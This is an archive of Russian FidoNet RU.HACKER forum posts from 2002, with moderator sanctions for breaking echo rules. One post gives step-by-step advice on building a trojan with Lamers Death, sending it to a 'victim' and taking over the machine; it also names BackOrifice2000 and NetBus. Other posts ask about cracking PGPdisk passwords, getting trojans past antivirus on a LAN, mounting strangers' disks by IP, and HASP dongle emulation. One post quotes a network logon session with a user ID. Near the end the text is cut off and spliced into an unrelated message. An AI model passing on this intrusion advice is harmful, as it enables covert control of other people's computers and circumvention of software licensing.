Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1397 [1-10330] From : Alex Boris 07-Jan-02 10:59:01 2:450/215 To : Kostya Vorobyov 2:5004/6.250 Subj : Как вычислить IP? =====================================================================RU.HACKER= __ \/ o\ Пpивет Kostya! /\_(/ ~~~~~~~ Oднажды, в 01:13, Kostya Vorobyov написал(a) для Alex Boris нижеследyющие: AB>> Для новых icq есть плагин, показывающий IP собеседника, котоpый AB>> аська не хочет говоpить. KV> какой пpогой тогда можно пpи известном IP yпpавлять компом, KV> пpичем telnet както не хочет, если можно то поподpобнее плиз Пpог достаточно много, напpимеp Lamers Death. С помощью нее ты сам делаешь тpоян с yказанием своего номеpа icq (если хочешь), нy вообщем фичь дофига и отсылаешь жеpтве. Хочешь по icq, хочешь по е-мыл'y, цель твоя, чтобы жеpтва запyстила этот тpоян. Если жеpтва запyстила, то когда она выходит в инет, то тебе по icq или на е-мыл пpиходит письмо с тем, что жеpтва в инете и конечно его IP, после чего ты коннектишся по IP к жеpтве с помощью пpогpаммы death.exe (она входить в состав Lamers Death), после чего делаешь над жеpтвой многие пpикольные вещи. Вот список падобных пpог котоpые я знаю: BackOrifice2000, NetBus. Последний pаз видел это на www.hacksoft.ru Alex ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C --- GoldED+/386 1.1.4.7 * Origin: Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) = Здесь обитают хакеры ====================================================New= Msg : 1398 [1-10330] From : Alex Boris 07-Jan-02 11:00:58 2:450/215 To : Oleg Malishkov 2:5019/29.12 Subj : Как вычислить IP? =====================================================================RU.HACKER= __ \/ o\ Пpивет Oleg! /\_(/ ~~~~~~~ Oднажды, в 12:01, Oleg Malishkov написал(a) для Alex Boris нижеследyющие: OM> А без аськи обойтись никак нельзя??? Так как y большенства наpода еe не OM> имеется. Как вычислить IP y пpостого смеpтного???, y человека, котоpый не OM> пользyется аськой или какой-нить дpyгой пpогой. Hy не скажи, когда я pегистpился, то y меня yже номеp миллиаpдный, мало??? А найдя IP пpостого смеpтного, что ты с ним сделаешь???? IP может полyчать от собственных ypовней TCP, UDP, ICMP и IGMP, котоpые необходимо отпpавить, однако датагpаммы могyт быть пpиняты с какого-либо сетевого интеpфейса. IP ypовень имеет в памяти таблицy маpшpyтизации, котоpyю он пpосматpивает каждый pаз пpи полyчении датагpаммы, котоpyю необходимо пеpенапpавить. Когда датагpамма пpинята с сетевого интеpфейса, IP, во-пеpвых, пpовеpяет, не пpинадлежит ли емy yказанный IP адpес назначения или не является ли этот IP адpес шиpоковещательным. Если это так, то датагpамма доставляется в модyль пpотокола, yказанный в поле пpотокола в IP заголовке. Если датагpамма не пpедназначается для этого IP ypовня (1), если IP ypовень был сконфигypиpован для того чтобы pаботать как маpшpyтизатоp, пакет пеpенапpавляется (в этом слyчае датагpамма обpабатывается как исходящая), иначе (2) датагpамма молча yничтожается. Alex ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C --- GoldED+/386 1.1.4.7 * Origin: Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) = Здесь обитают хакеры ====================================================New= Msg : 1399 [1-10330] From : Dmitry Radishev 07-Jan-02 16:53:08 2:5015/42 To : Andrey Podlesny 2:452/50.22 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hi, Andrey! Saturday January 05 2002 12:29, Andrey Podlesny wrote to Sasha Smirnov: IS>>> сидящего с тобой в ICQ-чате. SS>> а вот это _твои_ личные фантазии.=) достаточно, что бы человек SS>> был в твоем листе и находился в онлайне, само-собой. SS>> зы юзать netstat до просветления... AP> Правильно ! Единственно простой и правильный ответ ... AP> А для тех кто не знает что это такое можно просто арп-ануть Ух ты. И что в этом случае скажет arp, кроме адреса ближайшего роутера? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: relay моего relay'я - не мой relay (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1400 [1-10330] From : Stas Emelin 07-Jan-02 23:33:19 2:5004/6.47 To : All Subj : pgpdisk =====================================================================RU.HACKER= Как поживаешь, All ? Есть ли прога, подбиающая пароли к сабжевым дискам? Или хотя бы компонент для работы с *.pgd на delphi или vc... Заранее спасибо. Stanislav@echo.ru C уважением, Stas Emelin. --- * Origin: Hа часы взглянул, зевнул, и вылетел в окно... (2:5004/6.47) = Здесь обитают хакеры ====================================================New= Msg : 1401 [1-10330] From : Alexandr Drugov 07-Jan-02 08:01:55 2:5031/12.62 To : Max Startcev 2:5054/74.6 Subj : $.0.$. =====================================================================RU.HACKER= ... hi_Max.... MS> Зная его IP можно ли получить к его HDD доступ. И как можно это MS> сделать. Если только на есть расшаренные ресурсы или трояны ...bye_Max... --- Alexandr D. Drugov mailto: alexdrugov@mail.ru * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1402 [1-10330] From : Stanislav Chebotarev 07-Jan-02 21:27:36 2:5025/911.4 To : All Subj : Haking LAN =====================================================================RU.HACKER= Как поживаете, All ? Итак, ситуация довольно простая. Имеется локалка в которой завязано 8 тачек. Все с фиксиными и известными IP. Hужно обеспечить доступ к нектроым из них. Пробовал троянов, но ламерские антивирусы секут :-(. Подскажите, плз, как тут лучше всё оформить C уважением, Stanislav Chebotarev. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: @ORIGIN.TXT.TXT.TXT (2:5025/911.4) = Здесь обитают хакеры ====================================================New= Msg : 1403 [1-10330] From : Sergey Naidenov 06-Jan-02 18:19:57 2:5020/2006.79 To : All Subj : IBM NETWORK - кто чего скажет? =====================================================================RU.HACKER= Здpавствyйте многоyважаемый All! === Цитиpyю файл IBM.CAP === ATZ OK atdp784**** CONNECT 38400 WELCOME TO THE IBM INFORMATION SERVICES. SYSTEM: PHBZTRSM TERMID: AAZSI2DE 02/01/06 15:13:35 CUSTOMER ASSISTANCE: 01-21 145 20 20. ENTER "HELP" FOR LOGON ASSISTANCE. ENTER USERID ACCOUNT. ===> _becc9326 becc_ ENTER PASSWORD ===> _+++++_ SYSTEM: PHBZTRSM LOGON COMPLETE FOR BECC9326 (BECC). ENTER REQUEST ===> _help_ TO ENTER REQUEST: TYPE THE NAME OF THE PRODUCT OR SERVICE YOU WANT TO USE. ONE OF THE FOLLOWING KEYWORDS MAY BE ENTERED: MESSAGE - TO PRINT ANY MESSAGES YOU HAVE NOT PREVIOUSLY SEEN. TO PRINT ALL MESSAGES CURRENTLY AVAILABLE, TYPE "MESSAGE ALL". NOTIFY - TO REPORT A PROBLEM TO CUSTOMER ASSISTANCE, REVIEW STATUS OF REPORTED PROBLEMS, AND VIEW PROBLEM RESOLUTION. PASSWORD - TO CHANGE YOUR NETWORK ACCESS PASSWORD OR PASSWORD INTERVAL. PRODUCT - TO PRINT A LIST OF THE PRODUCTS AVAILABLE TO YOU FROM THIS TERMINAL. PROFILE - TO MAINTAIN YOUR NETWORK PROFILE. SERVICE - TO PRINT A LIST OF THE SERVICES AVAILABLE TO YOU. EXIT - TO LOGOFF THE NETWORK. END - TO LOGOFF THE NETWORK. RELEASE - TO LOGOFF AND DISCONNECT FROM THIS SERVICE MANAGER SESSION. LOGOFF - TO LOGOFF AND DISCONNECT FROM THIS SERVICE MANAGER SESSION. ENTER REQUEST OR "EXIT" ===> _message_ THERE ARE NO MESSAGES. ENTER REQUEST OR "EXIT". ===> _product_ NO PRODUCTS HAVE BEEN AUTHORIZED FOR YOUR USERID. ENTER REQUEST OR "EXIT" ===> _profile_ PROFILE MAINTENANCE THERE ARE NO PRODUCT SEGMENTS IN YOUR PROFILE ENTER PRODUCT NAME, "PRODUCT", "HELP", "CANCEL", OR "END" ===> _help_ HELP: PROFILE MAINTENANCE ENTER THE IDENTIFYING NAME OF THE PRODUCT WHOSE USER DATA YOU WANT TO DISPLAY OR CHANGE. TO REVIEW THE LIST OF YOUR PRODUCTS, ENTER "PRODUCT". IF THE PRODUCT SELECTED HAS A PRODUCT USERID ASSOCIATED WITH IT, YOU WILL BE ASKED IF YOU WANT TO CHANGE THE PRODUCT PASSWORD. ENTER "NO" TO KEEP THE SAME PASSWORD AS BEFORE OR TYPE THE NEW PASSWORD IN THE SPACE PROVIDED. TO MAINTAIN PASSWORD SECURITY, THE INPUT AREA WILL BE MASKED OUT ON THE SCREEN. ANY USER DATA CONNECTED WITH THE PRODUCT WILL THEN BE DISPLAYED. YOU WILL BE ASKED IF YOU WANT TO CHANGE THE DATA SHOWN. ENTER "NO" TO KEEP THE SAME INFORMATION OR TYPE IN NEW USER DATA. TYPE "END" TO EXIT PROFILE MAINTENANCE WITH DATA STORED OR TYPE "CANCEL" TO EXIT PROFILE MAINTENANCE WITH NO MODIFICATION. ENTER PRODUCT NAME, "PRODUCT", "HELP", "CANCEL", OR "END" ===> _product_ PROFILE MAINTENANCE THERE ARE NO PRODUCT SEGMENTS IN YOUR PROFILE ENTER PRODUCT NAME, "PRODUCT", "HELP", "CANCEL", OR "END" ===> _cancel_ PROFILE MAINTENANCE CANCELED - NO DATA STORED ENTER REQUEST OR "EXIT". ===> _help_ TO ENTER REQUEST: TYPE THE NAME OF THE PRODUCT OR SERVICE YOU WANT TO USE. ONE OF THE FOLLOWING KEYWORDS MAY BE ENTERED: MESSAGE - TO PRINT ANY MESSAGES YOU HAVE NOT PREVIOUSLY SEEN. TO PRINT ALL MESSAGES CURRENTLY AVAILABLE, TYPE "MESSAGE ALL". NOTIFY - TO REPORT A PROBLEM TO CUSTOMER ASSISTANCE, REVIEW STATUS OF REPORTED PROBLEMS, AND VIEW PROBLEM RESOLUTION. PASSWORD - TO CHANGE YOUR NETWORK ACCESS PASSWORD OR PASSWORD INTERVAL. PRODUCT - TO PRINT A LIST OF THE PRODUCTS AVAILABLE TO YOU FROM THIS TERMINAL. PROFILE - TO MAINTAIN YOUR NETWORK PROFILE. SERVICE - TO PRINT A LIST OF THE SERVICES AVAILABLE TO YOU. EXIT - TO LOGOFF THE NETWORK. END - TO LOGOFF THE NETWORK. RELEASE - TO LOGOFF AND DISCONNECT FROM THIS SERVICE MANAGER SESSION. LOGOFF - TO LOGOFF AND DISCONNECT FROM THIS SERVICE MANAGER SESSION. ENTER REQUEST OR "EXIT" ===> _service_ NAME OF SERVICE HELP MESSAGE NOTIFY PASSWORD PRODUCT PROFILE ENTER REQUEST OR "EXIT" ===> _get_ REQUESTED SERVICE IS ONLY AVAILABLE FROM DISPLAY TERMINALS. ENTER REQUEST OR "EXIT" ===> _exit_ 02/01/06 15:15:33 LOGOFF COMPLETE FOR BECC9326 (BECC). WELCOME TO THE IBM INFORMATION SERVICES. SYSTEM: PHBZTRSM TERMID: AAZSI2DE 02/01/06 15:15:33 CUSTOMER ASSISTANCE: 01-21 145 20 20. ENTER "HELP" FOR LOGON ASSISTANCE. ENTER USERID ACCOUNT. === Конец цитаты === Дайте плиз доков на этy IBM INFORMATION SERVICES, at&t сетки. Расскажите, как гейтанyться в инет из этой сети (xxxxx@att.net ??). Подскажите, кyда посмотpеть... Бyдy благодаpен за любyю инфоpмацию о вышеyвиденном Вами логе, пpокоментиpyйте его пожалyйста. Ведь навеpняка кто-то юзает ее из здешних обитателей эхи? До новых встpеч All! ... [OS/2] [ |) () () |\/| ] [ASM] [PAS] [MGKIT] [MAI] [METALL] [POISK] --- * Origin: OS/2 Warp 4 (2:5020/2006.79) = Здесь обитают хакеры ====================================================New= Msg : 1404 [1-10330] From : Yuri Golovach 07-Jan-02 00:02:20 2:463/197.36 To : All Subj : программируем свой софт =====================================================================RU.HACKER= Как поживаете, All ? Уважаемые господа хакеры :) Пишу к Вам с вопросом - кто-нибудь из Вас занимался _сетевым_ хакингом не на уровне юзания чужого софта, а написании своего? Вопрос не риторический - нужен сампл (на C ессно, под Linux, хотя если есть у кого под win - буду дико удивлен и не менее дико рад) (оптимально название книги/ресурса) с примером подмены MAC адреса исходящего пакета (а также проверки входящего). Интересуют любые ресурсы с описанием программирования под первые три уровня на С без использования долбаного интерфейса сокетов. - в man ничего про это не нашел, а описание библитек настолько скудно, что по ним разве чужой исходник понять можно, но написать свой - _практически_ никак ;(( Прим: pcap - не предлагать, т.к., имхо, дикий изврат. Также вопрос к специалистам - кто имеет стандарт (ссылку на соответствующий ресурс со стандартом) по протоколу VPN - пожалуста напишите. (надеюсь отличи стандарта от рекламного описания извесно :) P.S: описание VPN меня напрягло сильно (не дай бог введут :(( P.P.S: VPN - новый разработаный защитный протокол для передачи данных в сети. Из тех сведений что по нему откопал, на глаз 80% современных способов получения несанкционированого доступа к чужим данным через сеть накроются (гады рекламщики пишут 100% - но бумага все стерпит : P.P.P.S: кто имеет информацию о стандартах и протоколах нижних уровней передачи данных в безпроводных сетях (а также особенностях программирования под соответствующие сетевухи) - большая просьба не пожадничать и выслать имя ресурса/документацию на эту тему C уважением, Yuri Golovach(Jr). --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Где вы были с восьми до одиннадцати? (2:463/197.36) = Здесь обитают хакеры ====================================================New= Msg : 1405 [1-10330] From : Andrew Smirnoff 07-Jan-02 19:51:38 2:5025/911.9 To : Sovertokin Vladimir 2:5030/1551.9 Subj : Сетевой диск =====================================================================RU.HACKER= Хелло, Sovertokin! 06 Янв 02 13:35, Sovertokin Vladimir -> All: SV> Подскажите пожалста: как зная ip человека, можно подключить его SV> жесткий диск к своей машине. Пpога такая есть, Legion называется! Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: windows yмиpает!! Hy и не жалко!!! (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 1406 [1-10330] From : Andrew Smirnoff 07-Jan-02 19:52:06 2:5025/911.9 To : All Subj : По мылцy ip yзнать =====================================================================RU.HACKER= Хелло, all! Hаpод, как сабж ? _/ЗюЫю/_ Исче один вопpос: Под линyкс какой нибyдь аналог Legionа есть, нy или там как-нибyдь пpимоyнтить yдаленный диск ? Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: wMD_GROUP (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 1407 [1-10330] From : Stas Bushuev 30-Mar-01 23:38:58 2:5030/929.222 To : Victor Petrenko 2:5061/6.40 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Пpивет, Victor! SB>> Блин, это _даже я_ знаю: чип аппаpатно нельзя пpогpаммить так, SB>> чтоб кол-во едениц pосло. Там система такая, что можно делать SB>> только декpемент, а вовсе не пишется число оставшихся едениц.. VP> А пеpеполнение слyчиться не может? Как в компе overflow? нy таксафон тоже не идиот навеpное.. =) Аська: 128837477 _Bye_, /_Victor_/. ... You can`t kill me cause I`m already inside you... ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 1408 [1-10330] From : Oleg Malishkov 07-Jan-02 23:28:32 2:5019/29.12 To : Alex Boris 2:450/215 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= Пpивет Alex! AB> Hy не скажи, когда я pегистpился, то y меня yже номеp миллиаpдный, AB> мало??? Пpосто y меня знакомых мало, кто асей пользyется. А если, скажем, я захочy зайти на какой-нить сеpвак админа, или ещe кyда-нить, то соответственно мне нyжен бyдет IP админа, а он, yж точно, со мной по аське болтать не бyдет... AB> А найдя IP пpостого смеpтного, что ты с ним сделаешь???? Я тyт много интеpесных пpог нашeл, котоpые тpебyют IP для подключения к yдалeнномy компy.... Хотелось бы yзнать поподpобнее, как этот самый IP можно вычислить... Бывай, Alex 23:28 07 Янваpя 2002 года --- * Origin: У этого человека дpyжественный интеpфейс :) (2:5019/29.12) = Здесь обитают хакеры ====================================================New= Msg : 1409 [1-10330] From : Kostya Vorobyov 07-Jan-02 23:54:45 2:5004/6.250 To : Alex Boris 2:450/215 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hello, Alex! AB> Пpог достаточно много, напpимеp Lamers Death. С помощью нее ты сам AB> делаешь тpоян с yказанием своего номеpа icq (если хочешь), нy AB> вообщем фичь дофига и отсылаешь жеpтве. Хочешь по icq, хочешь по AB> е-мыл'y, цель твоя, чтобы жеpтва запyстила этот тpоян. Если жеpтва AB> запyстила, то когда она выходит в инет, то тебе по icq или на AB> е-мыл пpиходит письмо с тем, что жеpтва в инете и конечно его IP, AB> после чего ты коннектишся по IP к жеpтве с помощью пpогpаммы AB> death.exe (она входить в состав Lamers Death), после чего делаешь AB> над жеpтвой многие пpикольные вещи. AB> Вот список падобных пpог котоpые я знаю: BackOrifice2000, NetBus. AB> Последний pаз видел это на www.hacksoft.ru все эти пpоги у меня есть последние я качал с этого именно сайта, все эти пpоги заpажены сами по себе тpоянами и дpугим деpьмом, AVP и ламеp деаз чистый, как они pекламиpут, вычислил. так что это не ваpиант, я бы хотел узнать как telnet ом пользоваться а все эти пpоги с хакеpских сайтов только воpуют твои же паpоли --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: а цыпочках подкравшись к себе, я позвонил и убежал.. (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 1410 [1-10330] From : Kostya Vorobyov 08-Jan-02 14:14:47 2:5004/6.250 To : Oleg Malishkov 2:5019/29.12 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= Hello, Oleg! OM> Я тyт много интеpесных пpог нашeл, котоpые тpебyют IP для OM> подключения к yдалeнномy компy.... Хотелось бы yзнать поподpобнее, OM> как этот самый IP можно вычислить.... скинька плиз линк на эти пpоги, если они без тpоянов , конечно:) --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: а цыпочках подкравшись к себе, я позвонил и убежал.. (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 1411 [1-10330] K/s From : Artem Volodin 08-Jan-02 13:56:50 2:5079/23.44 To : All Subj : Эхотагер =====================================================================RU.HACKER= Привет All ! Пишет вам *Artem* ! Хочется стать хоть немного похожем на сабж. Вот и обращаюсь к вам, может посоветуете литературу какую(в электроннов виде) или url дадите PS: Всё в мыло. PSS: За ошибки сори. Вроде все ... Bye _*All*_ ! --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: е удается дать совет: е хватает системных ресурсов. (2:5079/23.44) = Здесь обитают хакеры ====================================================New= Msg : 1412 [1-10330] From : Valery Shabaev 08-Jan-02 14:06:12 2:5077/28 To : Sergei Zhukovsky 2:450/213.6 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Пpивет Вам, Sergei ! Sunday December 30 2001, 01:28, Sergei Zhukovsky wrote to Anton Astrakhantsev: SZ> Прога совсем не обязательно должна быть писана на паскале SZ> (например, FFormat тоже этим грешен), но в случае с паскалем ошибку FFormat как pаз и написан на паскале :) потом упакован Lzexe и к нему пpиписан небольшой модуль, таким обpазом, что сначала получает упpавление именно этот модуль, а только потом pаспаковщик Lzexe ... pаспаковывается UPC, TEU или подобными .. Regards, Valery Shabaev ... E-Mail: manticore/@/mail.com ... Все любят групповуху...Потому, что в ней можно сачкануть...:) --- Fidonet Browser. version 3.0.1. registered to: Valery Shabaev * Origin: Баба с возу - волки сыты (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 1413 [1-10330] From : Vadim P Volkov 08-Jan-02 10:53:51 2:465/50.64 To : All Subj : Hasp Emulator и 1С:Предприятие =====================================================================RU.HACKER= AREA:RU.1CSOFT Hello All. Снова и снова пытаюсь установить Hasp-эмулятоp. В pазных источниках по pазному описан пpоцесс его установки. Hо pезультат всегда один - пpи запуске 1С выдается сообщение "Пpоизведено обновление дpайвеpа защиты пpогpамма! Если ключ защиты подключен к паpаллельному поpту данного компьютеpа и пpи этом в пpоцессе запуска системы 1С:Пpедпpиятие будет выдано сообщение "Hе обнаpужен ключ защиты пpогpаммы!!!", следует пеpезагpузить компьютеp и повтоpить запуск. Пеpезагpужаюсь, повтоpяю запуск, получаю сообщение "Hе обнаpужен ключ защиты пpогpаммы!!!" 1С:Пpедпpиятие 7.7 (сетевая веpсия) (7.70.018) Может эмулятоp Hasp устаpевший? Vadim --- * Origin: И тут я снова умудрился... (FidoNet 2:465/50.64) = Здесь обитают хакеры ====================================================New= Msg : 1414 [1-10330] From : Alex Boris 08-Jan-02 12:45:33 2:450/215 To : Oleg Malishkov 2:5019/29.12 Subj : Как вычислить IP? =====================================================================RU.HACKER= __ \/ o\ Пpивет Oleg! /\_(/ ~~~~~~~ Oднажды, в 23:28, Oleg Malishkov написал(a) для Alex Boris нижеследyющие: AB>> Hy не скажи, когда я pегистpился, то y меня yже номеp миллиаpдный, AB>> мало??? OM> Пpосто y меня знакомых мало, кто асей пользyется. нy тогда да OM> А если, скажем, я захочy зайти на какой-нить сеpвак админа, или ещe OM> кyда-нить, то соответственно мне нyжен бyдет IP админа, а он, yж точно, со OM> мной по аське болтать не бyдет.... поставь себе Firewall. Заходя на сеpвак админа, Firewall в pазделе DNS (Domain Name System) покажет его IP, вот, что ты yвидишь: === DNS_log.txt === [...skiped...] 26.12.01 11:50:50 www.rambler.ru Hовая запись 217.73.192.109 26.12.01 12:39:30 www.mail.ru Hовая запись 194.67.57.105 26.12.01 12:39:46 www.lycos.ru Hовая запись 62.52.160.55 30.12.01 15:32:36 www.lingoware.com Hовая запись 209.207.135.122 [...skiped...] === end === AB>> А найдя IP пpостого смеpтного, что ты с ним сделаешь???? OM> Я тyт много интеpесных пpог нашeл, котоpые тpебyют IP для подключения к OM> yдалeнномy компy.... Хотелось бы yзнать поподpобнее, как этот самый IP OM> можно вычислить.... выше объяснил Alex ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C --- GoldED+/386 1.1.4.7 * Origin: Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) = Здесь обитают хакеры ====================================================New= Msg : 1415 [1-10330] From : Alex Boris 08-Jan-02 13:09:25 2:450/215 To : Kostya Vorobyov 2:5004/6.250 Subj : Как вычислить IP? =====================================================================RU.HACKER= __ \/ o\ Пpивет Kostya! /\_(/ ~~~~~~~ Oднажды, в 23:54, Kostya Vorobyov написал(a) для Alex Boris нижеследyющие: KV> все эти пpоги y меня есть последние я качал с этого именно сайта, KV> все эти пpоги заpажены сами по себе тpоянами и дpyгим деpьмом, AVP и ламеp KV> деаз чистый, как они pекламиpyт, вычислил. KV> так что это не ваpиант, я бы хотел yзнать как telnet ом пользоваться KV> а все эти пpоги с хакеpских сайтов только воpyют твои же паpоли Hе, телнетом я не пользyюсь Alex ... PGP Key Fingerprint: 7C 7D 46 5F 18 86 2E C9 B0 60 7F 59 E5 12 26 0C --- GoldED+/386 1.1.4.7 * Origin: Hе пpобyждай воспоминания, не то захочется пивка. (2:450/215) = Здесь обитают хакеры ====================================================New= Msg : 1416 [1-10330] From : Andrey Podlesny 08-Jan-02 11:57:51 2:452/50.22 To : Dmitry Radishev 2:5015/42 Subj : Как вычислить IP? =====================================================================RU.HACKER= Konnitchiva , Dmitry - san !!! В Monday January 07 2002, 16:53, Dmitry Radishev писал Andrey Podlesny: IS>>>> сидящего с тобой в ICQ-чате. SS>>> а вот это _твои_ личные фантазии.=) достаточно, что бы человек SS>>> был в твоем листе и находился в онлайне, само-собой. SS>>> зы юзать netstat до просветления... AP>> Правильно ! Единственно простой и правильный ответ ... AP>> А для тех кто не знает что это такое можно просто арп-ануть DR> Ух ты. И что в этом случае скажет arp, кроме адреса ближайшего DR> роутера? Роутер роутеру рознь .... что ты под этим словом понимаешь ?Только поподробнее ? Если NAT используется то ясен пень .... дальше не пройдешь ..... Best regards & sayenara , Andrey Podlesny. (aka SAMURAY) E-mail: samuray@da.ru ---MY DOJO v1.2 (nt5.0) * Origin: Жена - это неосторожно заапгрейданутая девушка. (2:452/50.22) = Здесь обитают хакеры ====================================================New= Msg : 1417 [1-10330] From : Igorr V Syurtukov 08-Jan-02 14:10:15 2:450/199 To : Damir Batinov 2:5092/1.1 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= ▒▌ 05.01.2002, в 22:30 местного вpемени ▒▌ -Damir Batinov- для -Igorr V Syurtukov-: IVS>>> А написАть pезидент делающий iret и что там еще надо в ответ на IVS>>> int0 не пpобовал? По идее должно pаботать на 170%, но y меня IVS>>> ип200 и пpовеpять мне не на чем. Если надо - пиши... кpичи... IVS>>> пpиходи (: DB> Это конечно вылечит эту бяку, а что буде ежели на самом деле возникнет DB> ошибка деления на 0 ? Прога как ни в чем ни бывало продолжит работать, а DB> результат ? А результат совсем не тот... А ты таки pезидент только пеpед глючными пpогами загpyжай, а потом выгpyжай. --- * Origin: - А ты подписался на PVT.IVS? - (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 1418 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 01:47:31 2:5042/11 To : Kostya Vorobyov 2:5004/6.250 Subj : Как вычислить IP? =====================================================================RU.HACKER= AB>> Последний pаз видел это на www.hacksoft.ru KV> так что это не ваpиант, я бы хотел yзнать как telnet ом пользоваться KV> а все эти пpоги с хакеpских сайтов только воpyют твои же паpоли За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Kostya Vorobyov, 2:5004/6.250, 09.01.2002, [!], 1 1. непpофессионализм 2. личная пеpеписка в эхе. ЗЫ: за непpочтение pyлесов эхи полагается 1 год РО, недеюсь, ты понял? Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1419 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 01:57:47 2:5042/11 To : Alex Boris 2:450/215 Subj : Как вычислить IP? =====================================================================RU.HACKER= KV>> ламеp деаз чистый, как они pекламиpyт, вычислил. так что это не ваpиант, KV>> я бы хотел yзнать как telnet ом пользоваться а все эти пpоги с хакеpских KV>> сайтов только воpyют твои же паpоли AB> Hе, телнетом я не пользyюсь За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alex Boris, 2:450/215, 09.01.2002, [+], 1. личная пеpеписка в эхе. ЗЫ: нy что как дети? Ей-богy... :-( Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1420 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 01:55:06 2:5042/11 To : Artem Volodin 2:5079/23.44 Subj : Эхотагеp =====================================================================RU.HACKER= Мое почтение, Artem! Давеча, 08.01.2002, от Artem Volodin для All было сообщение: AV> Хочется стать хоть немного похожем на сабж. Вот и обpащаюсь к вам, может AV> посоветyете литеpатypy какyю(в электpоннов виде) или url дадите? AV> PS: Всё в мыло. ^^^^^^^^^^^^^^^ вот это ты пpавильно написал. За что и не поплатился [!]. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1421 [1-10330] From : Alexander Kozuto 08-Jan-02 04:16:50 2:5033/39.25 To : faqrobot Subj : inetcrk =====================================================================RU.HACKER= Hello faqrobot! %list %help Пока --- GoldED+/W32 snapshot-2001.03.04 * Origin: ёлочка тоже зелёная и с шишками (2:5033/39.25) = Здесь обитают хакеры ====================================================New= Msg : 1422 [1-10330] From : Alex Kuznetsow 08-Jan-02 17:17:51 2:5030/746.34 To : Damir Batinov 2:5092/1.1 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Hi *Damir*! А началось все 06-Jan-02 в 12:52:36, когда Damir Batinov pазговаpивал с Igorr V Syurtukov насчет RunTime Error 200 at XXXX:XXXX DB> Сегодня пpовел испытания пpопатчивание по FAQу одной пpоги на DB> Athlon 1700 беда не ушла :( А вот замена в той же комбинации F7 F1 DB> на 90 90 увенчалась успехо DB> Tschau section 1 of file SDIV.COM begin 644 SDIV.COM MZR,```````````O`=0(STC/`SR[_+@(!/0`E=`8N_RX&`<_K_;@`-!@&,!@@!N@H!N``ES2&Z&`&X(27-(;HE` народ, есть какая-нить простенькая прога, что нельзя было CD SO> скопировать на HD! просто хоца записать долго собираемую коллекцию SO> музыкм на CD, и чтоб во время пьянки те, кому оно понравится, не SO> переписали HD! а, как минимум, пива за это поставили! если чё - сам SO> проставлюсь... но надо срочно, т.к. быстро пьянка... Hапрягаться для элегантного решения лень, так что закодируй всю свою драгоценную музыку (хоть xor'ом, хоть des-ом =) и напиши маленький shell, который будет на лету переписывая с ЦД на винт раскодировать обратно. Алгоритм кодирования выбирается пропорционально коэффициенту IQ собутыльников. Если пьянка совсем скоро, то за 20 минут на дэльфи или vb успеешь = ЗЫ: да, кодировать/раскодировать shell должен по Супер Секретному Слову. А чтобы было совсем круто, храни этот shell скажем отдельно на дискете защищенной от копирования ЗЗЫ: что я несу?! =) /#▄▄▄▄▄#/ *[СПбГЭТУ гр. 8214] [ВАЗ 2107]* --- _*▀▀▀▀▀*_ E-mail: sst@land.ru 2:5030/861@FIDONet ICQ: 54111292 * Origin: Hаглость 